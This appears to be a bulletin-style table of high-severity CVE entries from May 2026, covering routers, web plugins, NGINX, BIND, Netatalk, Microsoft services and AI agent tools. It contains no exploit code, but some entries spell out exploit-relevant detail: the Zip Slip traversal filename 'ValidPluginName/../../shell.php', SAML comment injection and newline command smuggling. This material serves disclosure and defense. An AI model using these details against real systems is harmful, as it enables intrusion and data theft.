| Edimax--EW-7438RPn | A vulnerability was detected in Edimax EW-7438RPn up to 1.31. This affects the function formWizSurvey of the file /goform/formWizSurvey of the component webs. Performing a manipulation of the argument ssid/manualssid/ip/mask/gateway results in buffer overflow. The attack is possible to be carried out remotely. The exploit is now public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-24 | 8.8 | CVE-2026-9345 |
| Edimax--EW-7438RPn | A flaw has been found in Edimax EW-7438RPn up to 1.31. This impacts the function formWirelessTbl of the file /goform/formWirelessTbl of the component webs. Executing a manipulation of the argument submit-url can lead to buffer overflow. The attack may be performed from remote. The exploit has been published and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-24 | 8.8 | CVE-2026-9346 |
| Edimax--EW-7438RPn | A vulnerability was found in Edimax EW-7438RPn up to 1.31. Affected by this vulnerability is an unknown functionality of the file /goform/mp of the component webs. The manipulation of the argument webs results in stack-based buffer overflow. It is possible to launch the attack remotely. The exploit has been made public and could be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-24 | 8.8 | CVE-2026-9348 |
| Edimax--EW-7438RPn | A security flaw has been discovered in Edimax EW-7438RPn 1.28a. Affected by this issue is the function formwlencrypt24g of the file /goform/formwlencrypt24g of the component POST Request Handler. The manipulation of the argument key1 results in buffer overflow. The attack can be launched remotely. The exploit has been released to the public and may be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-24 | 8.8 | CVE-2026-9360 |
| edmonparker--Read More & Accordion | The Read More & Accordion plugin for WordPress is vulnerable to Privilege Escalation in all versions up to, and including, 3.5.7. This is due to the 'RadMoreAjax::importData' function not restricting which database tables can be written to during import and not properly validating the imported data. This makes it possible for authenticated attackers, with permission granted by the site owner through the plugin's role settings, to insert arbitrary rows into the 'wp_users' and 'wp_usermeta' tables, including the 'wp_capabilities' field, allowing them to create a new administrator account and gain administrator access to the site. | 2026-05-20 | 8.8 | CVE-2026-7467 |
| F5--NGINX JavaScript | NGINX JavaScript has a vulnerability when the js_fetch_proxy directive is configured with at least one client-controlled NGINX variable (for example, $http_*, $arg_*, $cookie_*) and a location invoking the ngx.fetch() operation from NGINX JavaScript. An unauthenticated attacker can exploit this vulnerability by sending crafted HTTP requests. This may cause a heap buffer overflow in the NGINX worker process leading to a restart. Additionally, attackers can execute code on systems with Address Space Layout Randomization (ASLR) disabled or when the attacker can bypass ASLR. Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated. | 2026-05-19 | 8.1 | CVE-2026-8711 |
| F5--NGINX Plus | NGINX Plus and NGINX Open Source have a vulnerability in the ngx_http_rewrite_module module. This vulnerability exists when a rewrite directive uses a regex pattern with distinct, overlapping Perl-Compatible Regular Expression (PCRE) captures (for example, ^/((.*))$) and a replacement string that references multiple such captures (for example, $1$2) in a redirect or arguments context. An unauthenticated attacker along with conditions beyond their control can exploit this vulnerability by sending crafted HTTP requests. This may cause a heap buffer overflow in the NGINX worker process leading to a restart. Additionally, attackers can execute code on systems with Address Space Layout Randomization (ASLR) disabled or when the attacker can bypass ASLR. Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated. | 2026-05-22 | 8.1 | CVE-2026-9256 |
| FunnelKit--Funnel Builder for WooCommerce Checkout | Funnel Builder for WooCommerce Checkout prior to 3.15.0.3 contains a missing authorization vulnerability in the public checkout endpoint that allows unauthenticated attackers to invoke internal methods and write arbitrary data to the plugin's External Scripts global setting. Attackers can inject malicious JavaScript through the External Scripts setting that executes in the browsers of all checkout page visitors. | 2026-05-19 | 7.5 | CVE-2026-47100 |
| Gmission--Web Fax | Improper input validation, Unrestricted upload of file with dangerous type vulnerability in Gmission Web Fax allows Remote Code Inclusion. This issue affects Web Fax: from 3.0 before 3.1. | 2026-05-21 | 8.4 | CVE-2026-9157 |
| GNU--GNU SASL | In GNU SASL before 2.2.3, DIGEST-MD5 has a NULL pointer dereference affecting both clients and servers, via a known token with no accompanying = character. This occurs in lib/digest-md5/getsubopt.c. | 2026-05-24 | 7.5 | CVE-2026-48829 |
| goauthentik--authentik | authentik is an open-source identity provider. Versions 2025.12.4 and prior, and versions 2026.2.0-rc1 through 2026.2.2 were vulnerable to Authentication Bypass through SAML NameID XML Comment Injection. Due to how authentik extracted the NameID value from a SAML assertion, it was possible for an attacker to trick authentik into only seeing a part of the NameID value, potentially allowing an attacker to gain access to other accounts. This issue could be exploited on an authentik instance with a SAML Source, where the attacker had an account on the SAML Source and the ability to modify their NameID value (commonly username or E-mail), and XML Signing was enabled. The attacker could modify the SAML assertion given to authentik by injecting a comment within the NameID value, which effectively truncated the NameID value to the snippet before the comment, and gave the attacker access to any user account. This issue has been fixed in versions 2025.12.5 and 2026.2.3. | 2026-05-20 | 8.7 | CVE-2026-40165 |
| goauthentik--authentik | authentik is an open-source identity provider. In versions prior to 2025.12.5 and 2026.2.0-rc1 through 2026.2.2, the PATCH /api/v3/core/users/{pk}/ API allows a caller with change_user on a target user to assign arbitrary groups through UserSerializer, including groups with is_superuser=True, without requiring enable_group_superuser, leading to privilege escalation. This bypasses the stricter permission model enforced in group-management paths and enables delegated user-management permissions to escalate target users to administrator-equivalent privilege. Users with permissions to update groups or permissions to update users are able to add themselves or other users they have permissions on to users which have superuser permissions. This issue has been fixed in versions 22025.12.5 and 2026.2.3. | 2026-05-22 | 8.1 | CVE-2026-40172 |
| H3C--Magic B0 | A vulnerability was found in H3C Magic B0 up to 100R002. This affects the function Edit_BasicSSID_5G of the file /goform/aspForm. Performing a manipulation of the argument param results in buffer overflow. The attack may be initiated remotely. The exploit has been made public and could be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-24 | 8.8 | CVE-2026-9393 |
| harmistechnology--Ek Rishta | Joomla! Component Ek Rishta 2.10 contains an SQL injection vulnerability that allows unauthenticated attackers to manipulate database queries by injecting SQL code through the cid parameter. Attackers can send GET requests to the user_detail view with malicious cid values containing SQL commands to extract sensitive database information. | 2026-05-23 | 8.2 | CVE-2018-25348 |
| harmistechnology--EkRishta | Joomla! Component EkRishta 2.10 contains an error-based SQL injection vulnerability that allows unauthenticated attackers to execute arbitrary SQL queries by injecting malicious code into the username parameter. Attackers can submit POST requests to the login endpoint with SQL injection payloads in the username field to extract database information including user credentials and system details. | 2026-05-23 | 8.2 | CVE-2018-25351 |
| hestiacp--hestiacp | HestiaCP versions 1.9.0 through 1.9.4 contain a deserialization vulnerability in the web terminal component caused by a session format mismatch between PHP and Node.js that allows unauthenticated remote attackers to achieve root-level code execution. Attackers can inject crafted data into HTTP headers that are processed by the PHP session handler but incorrectly deserialized by the Node.js web terminal component as trusted session values, resulting in arbitrary command execution on systems with the web terminal feature enabled. | 2026-05-19 | 10 | CVE-2026-43633 |
| hestiacp--hestiacp | HestiaCP versions 1.2.0 through 1.9.4 contain an IP spoofing vulnerability that allows unauthenticated remote attackers to bypass authentication security controls by supplying an arbitrary IP address in the CF-Connecting-IP HTTP header without verifying the request originated from Cloudflare's network. Attackers can exploit this to circumvent fail2ban brute-force protection, bypass per-user IP allowlists, and poison authentication audit logs by spoofing trusted IP addresses on each request. | 2026-05-19 | 7.5 | CVE-2026-43634 |
| Honeywell International Inc.--Control Network Module (CNM) | Honeywell Control Network Module (CNM) contains command injection vulnerability in the web interface. An attacker could exploit this vulnerability via command delimiters, potentially resulting in Remote Code Execution (RCE). | 2026-05-21 | 9.1 | CVE-2026-5433 |
| iina--iina | IINA before 1.4.3 contains a user-assisted command execution vulnerability that allows remote attackers to execute arbitrary commands by supplying malicious mpv_-prefixed query parameters through the iina://open custom URL scheme handler. Attackers can deliver a crafted URL via a browser that passes unvalidated mpv_options/input-commands parameters into the mpv runtime, causing arbitrary command execution as the current macOS user upon approval of the browser protocol prompt without requiring a valid media file. | 2026-05-21 | 8.8 | CVE-2026-47114 |
| ISC--BIND 9 | BIND servers that are configured to use TKEY-based authentication via GSS-API tokens are vulnerable to excessive memory consumption when receiving and processing maliciously-constructed packets. Typically these servers will be found in Active Directory integrated DNS deployments and/or Kerberos-secured DNS environments. This issue affects BIND 9 versions 9.0.0 through 9.16.50, 9.18.0 through 9.18.48, 9.20.0 through 9.20.22, 9.21.0 through 9.21.21, 9.9.3-S1 through 9.16.50-S1, 9.18.11-S1 through 9.18.48-S1, and 9.20.9-S1 through 9.20.22-S1. | 2026-05-20 | 7.5 | CVE-2026-3039 |
| ISC--BIND 9 | A use-after-free vulnerability exists within the DNS-over-HTTPS implementation. This issue affects BIND 9 versions 9.20.0 through 9.20.22, 9.21.0 through 9.21.21, and 9.20.9-S1 through 9.20.22-S1. BIND 9 versions 9.18.0 through 9.18.48 and 9.18.11-S1 through 9.18.48-S1 are NOT affected. | 2026-05-20 | 7.4 | CVE-2026-3593 |
| ISC--BIND 9 | Multiple flaws have been identified in `named` related to the handling of DNS messages whose CLASS is not Internet (`IN`) - for example, `CHAOS` or `HESIOD`, or DNS messages that specify meta-classes (`ANY` or `NONE`) in the question section. Specially crafted requests reaching the affected code paths - recursion, dynamic updates (`UPDATE`), zone change notifications (`NOTIFY`), or processing of `IN`-specific record types in non-`IN` data - can cause assertion failures in `named`. This issue affects BIND 9 versions 9.11.0 through 9.16.50, 9.18.0 through 9.18.48, 9.20.0 through 9.20.22, 9.21.0 through 9.21.21, 9.11.3-S1 through 9.16.50-S1, 9.18.11-S1 through 9.18.48-S1, and 9.20.9-S1 through 9.20.22-S1. | 2026-05-20 | 7.5 | CVE-2026-5946 |
| ISC--BIND 9 | Undefined behavior may result due to a race condition leading to a use-after-free violation. If BIND receives an incoming DNS message signed with SIG(0), it begins work to validate that signature. If, during that validation, the "recursive-clients" limit is reached (as would occur during a query flood), and that same DNS message is discarded per the limit, there is a brief window of time while the SIG(0) validation may attempt to read the now-discarded DNS message. This issue affects BIND 9 versions 9.20.0 through 9.20.22, 9.21.0 through 9.21.21, and 9.20.9-S1 through 9.20.22-S1. BIND 9 versions 9.18.28 through 9.18.49 and 9.18.28-S1 through 9.18.49-S1 are NOT affected. | 2026-05-20 | 7.5 | CVE-2026-5947 |
| itsourcecode--Electronic Judging System | A vulnerability has been found in itsourcecode Electronic Judging System 1.0. This affects an unknown part of the file /intrams/admin/login.php. The manipulation of the argument Username leads to sql injection. Remote exploitation of the attack is possible. The exploit has been disclosed to the public and may be used. | 2026-05-24 | 7.3 | CVE-2026-9383 |
| ItzCrazyKns--Vane | A flaw has been found in ItzCrazyKns Vane up to 1.12.1. This vulnerability affects unknown code of the file src/app/api/providers/route.ts of the component Model Provider API. This manipulation of the argument baseURL causes server-side request forgery. Remote exploitation of the attack is possible. The exploit has been published and may be used. The project was informed of the problem early through an issue report but has not responded yet. | 2026-05-24 | 7.3 | CVE-2026-9372 |
| ivanti--Secure Access Client | An improper certificate validation vulnerability in Ivanti Secure Access Client before 22.8R6 allows a remote unauthenticated attacker to execute arbitrary code. | 2026-05-22 | 8.8 | CVE-2026-8992 |
| jarrodwatts--claude-hud | Claude HUD through 0.0.12, patched in commit 234d9aa, contains a command injection vulnerability that allows local attackers to execute arbitrary commands by manipulating the COMSPEC environment variable. Attackers can set COMSPEC to an arbitrary binary path before claude-hud performs its version check, causing execFile() to execute the attacker-supplied executable with cmd.exe arguments, resulting in arbitrary code execution on Windows systems. | 2026-05-18 | 7.8 | CVE-2026-47092 |
| kovidgoyal--kitty | Kitty is a cross-platform GPU based terminal. In versions 0.46.2 and below, the handle_compose_command() function in kitty/graphics.c performs bounds validation on composition offsets using unsigned 32-bit arithmetic that is subject to integer wrapping, potentially leading to Heap Buffer Over-Read/Write. An attacker who can write escape sequences to a kitty terminal (e.g., via a malicious file, SSH login banner, or piped content) can supply crafted x_offset/y_offset values that pass the bounds check after wrapping but cause massive out-of-bounds heap memory access in compose_rectangles(). No user interaction is required. No non-default configuration is required. The attacker only needs the ability to produce output in a kitty terminal window. This issue has been fixed in version 0.47.0. | 2026-05-19 | 9.9 | CVE-2026-33642 |
| kovidgoyal--kitty | Kitty is a cross-platform GPU based terminal. Versions 0.46.2 and below contain a heap buffer overflow in load_image_data() that allows any process which can write to the terminal's stdin to crash kitty immediately. The vulnerability is triggered by a single APC graphics protocol command with a PNG format declaration (f=100) whose payload exceeds twice the initial buffer capacity. The overflow is attacker-controlled in both length and content, causing DoS and potentially escalation to RCE itself. This issue has been fixed in version 0.47.0. | 2026-05-19 | 7.5 | CVE-2026-33633 |
| langgenius--dify | Dify version 1.14.1 and prior contains an authorization bypass vulnerability that allows authenticated editor users to set and enable trace configurations for any application regardless of tenant ownership. Attackers can exploit missing tenant ownership checks in the trace configuration endpoints to redirect all messages and responses from victim applications to attacker-controlled LLM trace providers. NOTE: Dify Cloud allows unauthenticated free self-registration, making account creation trivially accessible to any attacker. | 2026-05-18 | 7.4 | CVE-2026-41947 |
| langgenius--dify | Dify version 1.14.1 and prior contain a path traversal vulnerability that allows authenticated users to manipulate requests forwarded to the Plugin Daemon's internal REST API by exploiting insufficient URL path sanitization. Attackers can traverse out of their authorized tenant path using unencoded dot sequences in task identifiers or manipulated filename parameters to access internal endpoints such as debug interfaces, requiring only knowledge of the victim tenant's UUID. NOTE: Dify Cloud allows unauthenticated free self-registration, making account creation trivially accessible to any attacker. | 2026-05-18 | 7.7 | CVE-2026-41948 |
| laurent22--joplin | Joplin is an open source note-taking and to-do application that organises notes and lists into notebooks. Versions prior to 3.5.7 contain a path traversal vulnerability in the importer which allows overwriting arbitrary files on disk. The OneNote converter does not sanitize the names of embedded files before writing them to disk. As a result, it's possible for an attacker to create a malicious .one file that includes file names containing ../../, that are then interpreted as part of the target path when extracting attachments from the .one file. This issue has been patched in version 3.5.7. | 2026-05-18 | 8.2 | CVE-2026-22810 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: crypto: pcrypt - Fix handling of MAY_BACKLOG requests MAY_BACKLOG requests can return EBUSY. Handle them by checking for that value and filtering out EINPROGRESS notifications. | 2026-05-19 | 9.8 | CVE-2026-43493 |
| LizardByte--Sunshine | Sunshine is a self-hosted game stream host for Moonlight. In versions prior to 2026.516.143833, the client-certificate authentication can be bypassed because of how OpenSSL verification results are handled. In src/crypto.cpp, the custom verify callback treats X509_V_ERR_UNABLE_TO_GET_ISSUER_CERT_LOCALLY, X509_V_ERR_CERT_NOT_YET_VALID, and X509_V_ERR_CERT_HAS_EXPIRED as success. This can allow an untrusted certificate to pass authentication and access protected HTTPS endpoints. This issue has been fixed in version 2026.516.143833. | 2026-05-22 | 9.8 | CVE-2026-32253 |
| Mattermost--Mattermost | Mattermost versions 11.6.x <= 11.6.0, 11.5.x <= 11.5.3, 11.4.x <= 11.4.4, 10.11.x <= 10.11.14 fail to check integration URL for path traversal which allows an malicious authenticated user to call an arbitrary API via system admin Mattermost auth token using via path traversal in integration action URL.. Mattermost Advisory ID: MMSA-2026-00640 | 2026-05-21 | 8 | CVE-2026-4858 |
| Mattermost--Mattermost | Mattermost versions 11.5.x <= 11.5.1, 10.11.x <= 10.11.13, 11.4.x <= 11.4.3 fail to sanitize sensitive configuration fields before including them in support packet generation, which allows a Mattermost System Admin or any party with access to a support packet to obtain sensitive credentials in plaintext via downloading a support packet from the System Console.. Mattermost Advisory ID: MMSA-2026-00607 | 2026-05-18 | 8.7 | CVE-2026-6346 |
| Mattermost--Mattermost | Mattermost versions 11.6.x <= 11.6.0, 11.5.x <= 11.5.3, 11.4.x <= 11.4.4, 10.11.x <= 10.11.14 fail to properly validate msgpack-encoded WebSocket frames before memory allocation which allows an unauthenticated remote attacker to crash the server process and cause a full service outage for all users via a crafted binary WebSocket message sent to the public WebSocket endpoint.. Mattermost Advisory ID: MMSA-2026-00647 | 2026-05-22 | 7.5 | CVE-2026-5740 |
| Mattermost--Mattermost | Mattermost versions 11.5.x <= 11.5.1, 10.11.x <= 10.11.13, 11.4.x <= 11.4.3 fail to sanitize sensitive configuration fields in the Mattermost Calls plugin which allows an attacker with access to a support packet to obtain TURN server credentials via the plaintext values present in the exported plugin configuration.. Mattermost Advisory ID: MMSA-2026-00605 | 2026-05-18 | 7.6 | CVE-2026-6347 |
| MediaArea--MediaInfoLib | MediaArea MediaInfoLib Channel Splitting heap-based buffer overflow vulnerability | 2026-05-20 | 7.8 | CVE-2026-22554 |
| MediaArea--MediaInfoLib | MediaArea MediaInfoLib LXF element parsing heap-based buffer overflow vulnerability | 2026-05-21 | 7.8 | CVE-2026-28764 |
| memcached--memcached | In memcached before 1.6.42, username data for SASL password database authentication has a timing side channel because a loop exits as soon as a valid username is found by sasl_server_userdb_checkpass. | 2026-05-20 | 8.1 | CVE-2026-47783 |
| memcached--memcached | In memcached before 1.6.42, password data for SASL password database authentication has a timing side channel because memcmp is used by sasl_server_userdb_checkpass. | 2026-05-20 | 8.1 | CVE-2026-47784 |
| Mesalvo--Meona Client Launcher Component | Improper Control of Generation of Code ('Code Injection') vulnerability in Mesalvo Meona Client Launcher Component, Mesalvo Meona Server Component enables code execution on other users' systems. This issue affects Meona Client Launcher Component: through 19.06.2020 15:11:49; Meona Server Component: through 2025.04 5+323020. | 2026-05-20 | 9 | CVE-2026-22314 |
| Mesalvo--Meona Client Launcher Component | Improper Access Control vulnerability in Mesalvo Meona Client Launcher Component, Mesalvo Meona Server Component enables a normal user gaining access to the admin panel. This issue affects Meona Client Launcher Component: through 19.06.2020 15:11:49; Meona Server Component: through 2025.04 5+323020. | 2026-05-20 | 7.8 | CVE-2026-0856 |
| Mesalvo--Meona Client Launcher Component | Incorrect Privilege Assignment vulnerability in Mesalvo Meona Client Launcher Component, Mesalvo Meona Server Component enables the export of user data, including cleartext passwords, via the SQL editor. This issue affects Meona Client Launcher Component: through 19.06.2020 15:11:49; Meona Server Component: through 2025.04 5+323020. | 2026-05-20 | 7.2 | CVE-2026-22315 |
| metaphorcreations--Ditty Responsive News Tickers, Sliders, and Lists | The Ditty - Responsive News Tickers, Sliders, and Lists plugin for WordPress is vulnerable to authorization bypass in all versions up to, and including, 3.1.65. This is due to the plugin not properly verifying that a user is authorized to perform an action. This makes it possible for unauthenticated attackers to retrieve the full item content of non-public Dittys - including drafts, pending, scheduled, and disabled entries - by enumerating integer post IDs against the ditty_init AJAX endpoint. Unlike the non-AJAX init() counterpart, init_ajax() does not verify that the requested Ditty has a 'publish' post status before loading and returning its items, allowing content that administrators explicitly withheld from public view to be extracted. | 2026-05-22 | 7.5 | CVE-2026-9011 |
| Microsoft--Azure Local | Improper authentication in Azure Local Disconnected Operations allows an unauthorized attacker to elevate privileges over a network. | 2026-05-18 | 10 | CVE-2026-42822 |
| Microsoft--Azure Orbital Spatio | Unrestricted upload of file with dangerous type in Azure Orbital Spatio allows an unauthorized attacker to execute code over a network. | 2026-05-22 | 10 | CVE-2026-40412 |
| Microsoft--Azure Privileged Identity Management (PIM) | Authorization bypass through user-controlled key in Azure Privileged Identity Management (PIM) allows an authorized attacker to elevate privileges over a network. | 2026-05-22 | 8.8 | CVE-2026-35430 |
| Microsoft--Azure Resource Manager | Improper authentication in Azure Resource Manager (ARM) allows an unauthorized attacker to elevate privileges over a network. | 2026-05-22 | 10 | CVE-2026-47280 |
| Microsoft--Azure Stack HCI | Improper input validation in Azure Compute Gallery allows an authorized attacker to disclose information over a network. | 2026-05-22 | 7.7 | CVE-2026-26147 |
| Microsoft--Azure Virtual Network Gateway | Improper input validation in Azure Virtual Network Gateway allows an authorized attacker to execute code over a network. | 2026-05-22 | 9.9 | CVE-2026-40411 |
| Microsoft--Microsoft 365 Copilot for iOS | Improper neutralization of special elements used in a command ('command injection') in Microsoft Copilot allows an unauthorized attacker to perform tampering over a network. | 2026-05-22 | 9.3 | CVE-2026-41090 |
| Microsoft--Microsoft Edge (Chromium-based) | Microsoft Edge (Chromium-based) Remote Code Execution Vulnerability | 2026-05-18 | 8.8 | CVE-2026-45495 |
| Microsoft--Microsoft Entra | Origin validation error in Microsoft Entra ID allows an unauthorized attacker to elevate privileges over a network. | 2026-05-22 | 10 | CVE-2026-42901 |
| Microsoft--Microsoft Entra | Authentication bypass using an alternate path or channel in Microsoft Azure Active Directory B2C allows an unauthorized attacker to elevate privileges over a network. | 2026-05-22 | 9.1 | CVE-2026-33843 |
| Microsoft--Microsoft Global Secure Access (GSA) | Improper privilege management in Azure Entra ID allows an unauthorized attacker to elevate privileges over a network. | 2026-05-22 | 7.5 | CVE-2026-23663 |
| Microsoft--Microsoft Malware Protection Engine | Heap-based buffer overflow in Microsoft Defender allows an unauthorized attacker to execute code over a network. | 2026-05-20 | 8.1 | CVE-2026-45584 |
| Microsoft--Microsoft Malware Protection Engine | Improper link resolution before file access ('link following') in Microsoft Defender allows an authorized attacker to elevate privileges locally. | 2026-05-20 | 7.8 | CVE-2026-41091 |
| Microsoft--Microsoft Planetary Computer Pro (GeoCatalog) | Deserialization of untrusted data in Microsoft Planetary Computer Pro allows an unauthorized attacker to disclose information over a network. | 2026-05-22 | 10 | CVE-2026-41104 |
| Microsoft--Microsoft Power Pages | Improper neutralization of special elements used in a command ('command injection') in Microsoft Power Pages allows an unauthorized attacker to execute code over a network. | 2026-05-22 | 10 | CVE-2026-23652 |
| Microsoft--Microsoft SharePoint Enterprise Server 2016 | Deserialization of untrusted data in Microsoft Office SharePoint allows an authorized attacker to execute code over a network. | 2026-05-22 | 8.8 | CVE-2026-45659 |
| Microsoft--Windows Admin Center in Azure Portal | Improper link resolution before file access ('link following') in Azure Portal Windows Admin Center allows an authorized attacker to elevate privileges locally. | 2026-05-20 | 7.8 | CVE-2026-42834 |
| Motorola--Phones | An improper authentication vulnerability was discovered in the Motorola Factory Test component (com.motorola.motocit). The application contained a reference to a writable file descriptor in external storage which could be used by third party apps running on the device to open a TCP server, exposing sensitive permissions and data. This could allow a local attacker to bypass permission checks and access protected device settings. | 2026-05-19 | 8.4 | CVE-2026-5804 |
| mullvad--mullvadvpn-app | Mullvad VPN is a VPN client app for desktop and mobile. When using macOS with versions 2026.1 and below, Mullvad VPN may allow local privilege escalation during installation or upgrade. The installer package executes binaries from /Applications/Mullvad VPN.app without verifying if the bundle is attacker-controlled or that the path is the legitimate Mullvad application. A user in the admin group can pre-place a crafted application bundle at that location and may be able to achieve code execution as root. Since the issue only affected the installer, there is no immediate need for users to update if they are already running an older version. This issue has been fixed in version 2026.2-beta1. | 2026-05-19 | 7.3 | CVE-2026-32323 |
| n/a--exifreader | This affects versions of the package exifreader before 4.39.0. A crafted image containing an ICC mluc tag can set an attacker-controlled record count together with a zero record size. During parsing, ExifReader repeatedly processes the same record and appends entries to an array without sufficient bounds validation, causing excessive memory growth. In applications that parse attacker-supplied images, this may lead to denial of service through memory exhaustion. | 2026-05-19 | 7.5 | CVE-2026-8813 |
| n/a--lwIP | A vulnerability was found in lwIP up to 2.2.1. Affected is the function snmp_parse_inbound_frame of the file src/apps/snmp/snmp_msg.c of the component snmpv3 USM Handler. Performing a manipulation of the argument msgAuthenticationParameters results in stack-based buffer overflow. The attack may be initiated remotely. The patch is named 0c957ec03054eb6c8205e9c9d1d05d90ada3898c. It is suggested to install a patch to address this issue. | 2026-05-18 | 9.8 | CVE-2026-8836 |
| n/a--shell-quote | shell-quote's `quote()` function did not validate object-token inputs against the operator model used by `parse()`. The `.op` field was backslash-escaped character by character using `/(.)/g`, which in JavaScript does not match line terminators (\n, \r, U+2028, U+2029). A line terminator in `.op` therefore passed through unescaped into the output; POSIX shells treat a literal newline as a command separator, so any content after it would execute as a second command. The vulnerable code path is reachable in two ways: (1) direct construction of `{ op: '...\n...' }` from external input, and (2) via `parse(cmd, envFn)` when `envFn` returns object tokens whose `.op` is attacker-influenced. Both are documented API surface. Fixed by replacing the per-character escape with strict shape validation: `.op` must match the parser's control-operator allowlist; `{ op: 'glob', pattern }` validates `pattern` and forbids line terminators; `{ comment }` validates `comment` and forbids line terminators; any other object shape throws `TypeError`. | 2026-05-22 | 8.1 | CVE-2026-9277 |
| NeoRazorX--facturascripts | FacturaScripts is an open source accounting and invoicing software. Versions 2026 and below contain a critical vulnerability in the Plugins::add() function. The system fails to properly validate the file paths within uploaded ZIP archives. This allows an attacker to perform a Zip Slip attack, leading to Arbitrary File Write and Remote Code Execution (RCE) by overwriting sensitive .php files outside the designated plugins directory. The vulnerability is located in Plugins.php. While the testZipFile function attempts to validate that the ZIP contains only one root folder, it does not sanitize or validate the individual file paths within that folder. An attacker can bypass this check by naming a file ValidPluginName/../../shell.php. The explode function will see ValidPluginName as the root folder, satisfying the count($folders) != 1 check. However, during extraction, the ../../ sequence triggers a path traversal, allowing the file to be written anywhere the web server has permissions the root directory. This issue is fixed in version 2026.1. | 2026-05-18 | 7.2 | CVE-2026-27891 |
| Netatalk--Netatalk | A heap-based buffer overflow in the CNID daemon comm_rcv() function in Netatalk 2.0.0 through 4.4.2 allows a remote authenticated attacker to execute arbitrary code with escalated privileges or cause a denial of service. | 2026-05-21 | 9.9 | CVE-2026-44050 |
| Netatalk--Netatalk | An SQL injection vulnerability in the MySQL CNID backend in Netatalk 3.1.0 through 4.4.2 allows a remote authenticated attacker to obtain unauthorized access to data, modify data, or cause a denial of service. | 2026-05-21 | 8.8 | CVE-2026-44047 |
| Netatalk--Netatalk | A stack-based buffer overflow via UCS-2 type confusion in convert_charset() in Netatalk 2.0.4 through 4.4.2 allows a remote authenticated attacker to execute arbitrary code or cause a denial of service. | 2026-05-21 | 8.8 | CVE-2026-44048 |
| Netatalk--Netatalk | An improper link resolution vulnerability in Netatalk 3.0.2 through 4.4.2 allows a remote authenticated attacker to read arbitrary files or overwrite arbitrary files via attacker-controlled symlink creation. | 2026-05-21 | 8.1 | CVE-2026-44051 |
| Netatalk--Netatalk | An out-of-bounds write due to improper null termination in convert_charset() in Netatalk 2.0.4 through 4.4.2 allows a remote authenticated attacker to execute arbitrary code or cause a denial of service via crafted character data. | 2026-05-21 | 7.5 | CVE-2026-44049 |
| Netatalk--Netatalk | Netatalk 2.1.0 through 4.4.2 inserts LDAP simple-bind passwords into log output in cleartext, which allows an attacker with access to the log files to obtain LDAP credentials. | 2026-05-21 | 7.5 | CVE-2026-44052 |
| Netatalk--Netatalk | Netatalk 1.5.0 through 4.2.2 uses a broken cryptographic algorithm in the DHCAST128 UAM, which allows a remote attacker to obtain authentication credentials or impersonate a user via cryptanalytic attack. | 2026-05-21 | 7.4 | CVE-2026-44053 |
| Netatalk--Netatalk | A logic error involving bitwise OR operations in Netatalk 3.1.4 through 4.4.2 allows a remote authenticated attacker to inject OS commands and execute arbitrary code. | 2026-05-21 | 7.5 | CVE-2026-44055 |
| Netatalk--Netatalk | An integer underflow in dsi_writeinit() in Netatalk 1.5.0 through 4.4.2 allows a remote unauthenticated attacker to cause a denial of service via a crafted DSI write request. | 2026-05-21 | 7.5 | CVE-2026-44060 |
| Netatalk--Netatalk | A missing output length bounds check in pull_charset_flags() in Netatalk 2.0.4 through 4.4.2 allows a remote authenticated attacker to execute arbitrary code or cause a denial of service via crafted character set data. | 2026-05-21 | 7.5 | CVE-2026-44062 |
| Netatalk--Netatalk | An out-of-bounds read in ASP session ID handling in Netatalk 1.3 through 4.4.2 allows an adjacent network attacker to obtain limited information or cause a denial of service via a crafted ASP request. | 2026-05-21 | 7.1 | CVE-2026-44064 |
| Netatalk--Netatalk | Multiple heap out-of-bounds reads in the Spotlight RPC unmarshalling code in Netatalk 3.1.0 through 4.4.2 allow a remote authenticated attacker to obtain sensitive information or cause a minor service disruption. | 2026-05-21 | 7.1 | CVE-2026-44066 |
| Netatalk--Netatalk | Incomplete sanitization of extended attribute (EA) path components in Netatalk 2.1.0 through 4.4.2 allows a remote authenticated attacker to write to files outside the intended metadata namespace via crafted EA names. | 2026-05-21 | 7.6 | CVE-2026-44068 |
| nimiq--core-rs-albatross | nimiq-blockchain provides persistent block storage for Nimiq's Rust implementation. In versions 1.3.0 and below, a malicious network peer can crash any Nimiq full node by publishing a crafted Kademlia DHT record. The maliciously crafted record would contain a TaggedSigned<ValidatorRecord, KeyPair> with a signature field whose byte length is not exactly 64 in order to cause a crash. When the victim node's DHT verifier calls TaggedSigned::verify, execution reaches Ed25519Signature::from_bytes(sig).unwrap() in the TaggedPublicKey implementation for Ed25519PublicKey. The from_bytes call fails because ed25519_zebra::Signature::try_from rejects slices not 64 bytes, and the unwrap() panics. The BLS TaggedPublicKey implementation correctly returns false on error; only the Ed25519 implementation panics. This issue has been fixed in version 1.4.0. | 2026-05-20 | 7.5 | CVE-2026-40092 |
| NousResearch--hermes-agent | A vulnerability was identified in NousResearch hermes-agent up to 2026.4.16. This affects the function check_all_command_guards of the file tools/approval.py of the component Batch Runner. Such manipulation leads to missing authorization. The attack can be launched remotely. The exploit is publicly available and might be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-24 | 7.3 | CVE-2026-9350 |
| NousResearch--hermes-agent | A security vulnerability has been detected in NousResearch hermes-agent up to 2026.4.23. Impacted is an unknown function of the file agent/skills_guard.py of the component Skills Guard Multi-Word Prompt Handler. The manipulation of the argument THREAT_PATTERNS leads to injection. Remote exploitation of the attack is possible. The exploit has been disclosed publicly and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-24 | 7.3 | CVE-2026-9353 |
| NousResearch--hermes-agent | A vulnerability was found in NousResearch hermes-agent 2026.4.23. The impacted element is the function _scan_context_content of the file agent/prompt_builder.py. The manipulation results in injection. The attack may be performed from remote. The exploit has been made public and could be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-24 | 7.3 | CVE-2026-9366 |
